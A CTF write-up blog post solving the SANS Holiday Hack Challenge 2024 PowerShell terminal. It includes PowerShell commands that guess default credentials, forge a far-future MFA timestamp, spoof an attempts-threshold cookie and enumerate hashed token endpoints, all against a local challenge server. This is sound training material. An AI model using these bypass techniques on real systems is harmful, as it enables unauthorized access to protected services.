17 KiB
+++
author = "Maik de Kruif"
title = "PowerShell"
subtitle = "Act 2 - SANS Holiday Hack Challenge 2024"
date = 2025-01-03T12:36:23+01:00
description = "In the PowerShell challenge, we help Piney Sappington unlock the snowball weaponry system. For silver, we solve tasks using PowerShell cmdlets like Get-Content
and Invoke-WebRequest
. For gold, we script a solution to generate token hashes, manage cookies, and iterate through data to bypass the standard path and secure the medal!"
cover = "img/writeups/holiday-hack-challenge/2024/act2/powershell/cover.png"
tags = [
"Holiday Hack Challenge",
"ctf",
"hacking",
"writeup",
]
categories = [
"ctf",
"writeups",
"hacking",
]
+++
Link
If you want to play the challenge yourself, you can find it here:
https://2024.holidayhackchallenge.com/
Story line
Let's start off by talking to the elf:
Hey there, friend! Piney Sappington here.
You've probably heard the latest—things are getting tense around here with all the faction business between Wombley and Alabaster. But, let’s focus on this PowerShell Terminal for now.
This is the remote access for our snowball weaponry. We programmed some defense mechanisms to deter intruders, but the system is in a faulty lockdown state.
I certainly wasn't the one that programmed the mechanism. Nope not me. But can you help me find a way through it so I can regain access?
There's two functions I need access to. The snow cannon terminal, which should be easier. And the snow cannon production and deployment plans. That one's better defended.
Still, I've got faith in you. We need every advantage we can get right now, and you might be just the one to tip the balance.
So, think you can do it? Are you ready to show what you've got?
Hints
There are no hints available.
Recon
Upon opening the challenge, we’re greeted with a terminal. It looks a lot like the [Curling]({{% ref "writeups/holiday-hack-challenge/2024/act1/curling.md" %}}) challenge from before, but this time we’ll have to use some PowerShell to solve the challenge.
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/welcome.png" title="Welcome screen" >}}
Let’s enter “y”, press enter, and start the challenge.
Silver
Task 1
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question1.png" title="Question 1" >}}
We're starting off easy. To get the contents of a file we can use the Get-Content
cmdlet.
Get-Content welcome.txt
Task 2
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question2.png" title="Question 2" >}}
Now we'll have to count the words in the file. We can do this by combining the previous command with the Measure-Object
cmdlet.
Get-Content welcome.txt | Measure-Object -Word
Task 3
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question3.png" title="Question 3" >}}
For the third task, we have to find a server on the local machine, we can use netstat
for that.
netstat -a
Task 4
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question4.png" title="Question 4" >}}
Now that we've found the server, we have to send a request to it. The Invoke-WebRequest
cmdlet is made for that.
Invoke-WebRequest "http://localhost:1225"
Task 5
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question5.png" title="Question 5" >}}
Next up is sending HTTP Basic authentication credentials. In PowerShell, we can use the Get-Credential
cmdlet to configure the credentials. Afterwards, we can send them along with out request.
The credentials are not given here, but we can use come common combinations like "admin" as the username and "password" as the password. After trying a few, we'll find that using "admin" for both works.
$cred = Get-Credential # enter admin:admin
Invoke-WebRequest "http://localhost:1225" -Credential $cred -AllowUnencryptedAuthentication
Task 6
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question6.png" title="Question 6" >}}
The credentials worked, and we got a response. The response contains quite a few links, so we'll create a loop to go over them, and find the one we need.
The result from Invoke-WebRequest
has the Links
attribute, which contains a list of all the links on the webpage. We can loop over those, send a request for each of them, and use the Measure-Object
cmdlet again to count the words.
$res = Invoke-WebRequest "http://localhost:1225" -Credential $cred -AllowUnencryptedAuthentication
foreach ($link in $res.Links){
$endpoint_res = Invoke-WebRequest $link.href -Credential $cred -AllowUnencryptedAuthentication
$count = $endpoint_res.Content | Measure-Object -Word
if ($count.Words -eq 138) {
$endpoint_res.Content
}
}
Task 7
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question7.png" title="Question 7" >}}
We found the one, and it contains a reference to a CSV file. Let's use Invoke-WebRequest
again to get the file.
Invoke-WebRequest "http://127.0.0.1:1225/token_overview.csv" -Credential $cred -AllowUnencryptedAuthentication
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/shortened-content.png" title="Shortened content" >}}
After getting the file, the tasks isn't completed yet. By default, only a small part of the content is shown, and the rest is cut off. We can save the response to a variable, and use .Content
to get the full output.
$csv = Invoke-WebRequest "http://127.0.0.1:1225/token_overview.csv" -Credential $cred -AllowUnencryptedAuthentication
$csv.Content
Task 8
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question8.png" title="Question 8" >}}
Now we just need to send a simple request again. We can find how it should look like by looking at one of the comments at the end of the CSV file. We also know which column contains the sha256sum by looking at the previous response (the header was in there).
Invoke-WebRequest "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication
Task 9
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question9.png" title="Question 9" >}}
For task 9, we'll have to send a cookie along with the request. We can do this by using the -Headers
parameter to manually set the cookie header. For the value we can use the file's MD5 hash from the CSV.
$res = Invoke-WebRequest "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc"}
$res.Content
Task 10
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question10.png" title="Question 10" >}}
Next, we'll have to send another request with another cookie to a different endpoint.
Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc; mfa_token=1735818892.786766"}
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/mfa-expired.png" title="MFA token expired" >}}
I took a break in between solving task 9 and 10, so by the time I sent the request the token had already expired. We can solve this issue using two different methods.
The first method is to just request a new token. We can grab the token from the response automatically using the Links
attribute again, and sent it along.
$token = Invoke-WebRequest "http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc"}
$mfa_token = $token.Links[0].href
$res = Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc; mfa_token=$mfa_token"}
$res.Content
From taking a good look at the mfa token values though, it looks like it could be a unix time stamp; every time you request one the value increases slightly depending on time, and from experience I can see the value seems right for the current time.
Let's try just sending a timestamp very far ahead in the future.
$res = Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=5f8dd236f862f4507835b0e418907ffc; mfa_token=2735818892.786766"}
$res.Content
Task 11
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/question11.png" title="Question 11" >}}
Yay, that worked! Now for out final task, we'll have to base64 decode a string. This is not implemented in PowerShell itself, but luckily we can use some methods from the System namespace from .NET.
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg=="))
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/silver.png" title="End of silver" >}}
Gold
Continued story line
Let's first talk to the elf again, he'll tell us what we'll have to do for gold.
Fantastic work! You've navigated PowerShell’s tricky waters and retrieved the codeword—just what we need in these uncertain times. You're proving yourself a real asset!
I'll let you in on a little secret—there’s a way to bypass the usual path and write your own PowerShell script to complete the challenge. Think you're up for it? I know you are!
Well done! you've demonstrated solid PowerShell skills and completed the challenge, giving us a bit of an edge. Your persistence and mastery are exactly what we need—keep up the great work!
New hints
We also got some new hints from the elf.
{{< collapsible-block title="PowerShell Admin Access - Total Control" isCollapsed="true" class="tight" >}}
I overheard some of the other elves talking. Even though the endpoints have been redacted, they are still operational. This means that you can probably elevate your access by communicating with them. I suggest working out the hashing scheme to reproduce the redacted endpoints. Luckily one of them is still active and can be tested against. Try hashing the token with SHA256 and see if you can reliably reproduce the endpoint. This might help, pipe the tokens to Get-FileHash -Algorithm SHA256
.
{{< /collapsible-block >}}
{{< collapsible-block title="PowerShell Admin Access - Fakeout EDR Threshold" isCollapsed="true" class="tight" >}} They also mentioned this lazy elf who programmed the security settings in the weapons terminal. He created a fakeout protocol that he dubbed Elf Detection and Response "EDR". The whole system is literally that you set a threshold and after that many attempts, the response is passed through... I can't believe it. He supposedly implemented it wrong so the threshold cookie is highly likely shared between endpoints! {{< /collapsible-block >}}
Solving
From reading the hints, it seems like we need to generate a hash for a redacted token. Luckily, one of them isn't redacted, and so we have an example of what the outcome should be. The hint also refers to SHA256, which looks right since that is also what we saw in the CSV header.
Before implementing this, it's good to first experiment on what we need. We can use CyberChef to test the hash hypothesis. If we create a recipe for a simple SHA256 hash of the input, we'll quickly find out that the output is not what we expect.
When playing around with the input value, we'll find that if we add a newline character to the input and run the recipe, it does return the expected output. This is not totally unexpected, as files often have an empty line at the end. This may have also been the case when the current hashes we generated.
In PowerShell, we can generate hashes using Get-FileHash
. This only supports files or streams as an input though, so we'll need to create either of those for it to work. Creating a stream from a string is fairly straightforward, so let's take that route.
$token = "5f8dd236f862f4507835b0e418907ffc`n"
$tokenAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($tokenAsStream)
$writer.write($token)
$writer.Flush()
$tokenAsStream.Position = 0
(Get-FileHash -Algorithm SHA256 -InputStream $tokenAsStream).Hash
4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C
Perfect, it works exactly as we need it to. We can now also try it with a different token, and send the request.
$rawToken = "67c7aef0d5d3e97ad2488babd2f4c749"
$token = "$rawToken`n"
$tokenAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($tokenAsStream)
$writer.write($token)
$writer.Flush()
$tokenAsStream.Position = 0
$hash = (Get-FileHash -Algorithm SHA256 -InputStream $tokenAsStream).Hash
$hash
Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/$hash" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=$rawToken; mfa_token=2735818892.786766"}
Great, the server accepted the request. We got a response about a cookie being set.
{{< figure src="/img/writeups/holiday-hack-challenge/2024/act2/powershell/set-attempts-cookie.png" title="Setting cookie result" >}}
The cookie attempts
is being set to c25ha2VvaWwK01
. Let's add that to our request.
Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/$hash" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=$rawToken; mfa_token=2735818892.786766; attempts=c25ha2VvaWwK10"}
<h1>[-] ERROR: Access Denied</h1><br> [!] Logging access attempts
Now we got a different response, but a cookie is still being set. This time attempts
is being set to c25ha2VvaWwK02
. We can keep repeating this process, and eventually the cookie will stay at c25ha2VvaWwK10
.
We still don't get any medal or a different message though. Perhaps the token we've chosen is not the right one, and we need a specific other one. To test this, we can create a loop that will go over all the tokens in the CSV file, making sure to skip the first line (the csv header), and the last eight line (comments).
$cred = Get-Credential # admin:admin
$csv = Invoke-WebRequest "http://127.0.0.1:1225/token_overview.csv" -Credential $cred -AllowUnencryptedAuthentication
foreach ($line in $($csv.Content -split "`n" | Select-Object -Skip 1 | Select-Object -SkipLast 8)){
$rawToken = $line -split "," | Select-Object -First 1 # remove ,REDACTED from the line
$token = "$rawToken`n"
$tokenAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($tokenAsStream)
$writer.write($token)
$writer.Flush()
$tokenAsStream.Position = 0
$hash = (Get-FileHash -Algorithm SHA256 -InputStream $tokenAsStream).Hash
$mfa = Invoke-WebRequest "http://127.0.0.1:1225/mfa_validate/$hash" -Credential $cred -AllowUnencryptedAuthentication -Headers @{Cookie="token=$rawToken; mfa_token=2735818892.786766; attempts=c25ha2VvaWwK10"}
$mfa.RawContent
}
If we now run this and wait a second or two, we'll get the gold medal!
Final elf message
Incredible! You tackled the hard path and showed off some serious PowerShell expertise. This kind of skill is exactly what we need, especially with things heating up between the factions.